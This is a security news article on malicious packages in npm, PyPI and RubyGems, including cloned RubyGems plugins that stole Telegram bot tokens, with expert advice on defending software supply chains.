Open-source code repos open to supply chain attacks, researchers warn

Multiple malicious packages were discovered causing supply chain incidents across leading open-source code repos such as npm, PyPI and RubyGems. While repos speed development, the issue highlights how the packages expose dev teams to security risks.

The issues around open-source repos were brought up in reports by leading research groups over the past several weeks, including Checkmarx, ReversingLabs, and Socket, according to The Hacker News.

In one of the more prolific cases recently discovered, two open-source code repositories on RubyGems were created as near perfect clones of legitimate code repositories. A single line swap could reroute every Telegram API call through a Cloudflare Worker under the attacker’s control, siphoning bot tokens, chat IDs, messages and file uploads.

Jason Soroko, senior fellow at Sectigo, explained that the operator — using Vietnamese-language aliases — pushed the RubyGems code just days after Vietnam banned Telegram, but the code had no geofence, so any Fastlane pipeline that pulled the plugin was compromised.

“Open-source registries such as npm, PyPI, and RubyGems have the potential to become malware distribution channels,” said Soroko. “Attackers weaponize typosquats and copy forks because dependency sprawl, auto-updates, and opaque transitive pulls let a single rogue publish slip past reviews and land in production builds. Supply chain incidents now rival traditional exploits in frequency. Developers use these open-source repositories constantly and almost without thinking.”

Nic Adams, co-founder and CEO at 0rcus, added that security pros remain tethered to npm, PyPI, and RubyGems because they offer speed and access to critical dependencies. The advantages to developers: vast open-source libraries, seamless integration into CI/CD pipelines, broad community support, frequent updates, rapid innovation/lifecycles.

“The alternative, is closed or internal repos, which lack flexibility via slow delivery,” said Adams. “Despite known supply chain risks, pure velocity and overall convenience of aforementioned platforms keep them deeply intertwined in modern development and operations. Attackers exploit weak or automated publishing controls, repurpose trusted package names with subtle misspellings, weaponize nested dependencies to bypass audits, and leverage social engineering to gain repo access.”

What can dev teams do?

Mitigation requires a layered defense, Adams added: teams need to implement automated static and dynamic analysis on all dependencies, enforce strict version pinning, employ dependency provenance and signature verification, isolate build environments, maintain real-time threat intelligence feeds monitoring for suspicious package behaviors.

They also need to integrate package risk-scoring tools and automate alerts for newly reported malicious or typosquatting packages.

“Balancing speed with security means embedding these checks directly into CI/CD workflows, shifting left without introducing friction or manual gatekeeping bottlenecks,” said Adams.

Darren Meyer, security research advocate at Checkmarx, added that developers need to select packages and move quickly to maintain productivity and delivery velocity within their organizations, while AppSec teams want to make sure this gets done in a way that protects the organization's data and infrastructure.

“Implementing tools that have an API that allows for automated identification of malicious packages before they are downloaded and used is essential to hitting that balance,” said Meyer. “If an organization uses a package management repository — which they really should — then they can gain a lot of safety by enforcing its use and plugging a malicious package protection API to ensure that repository stays clean.”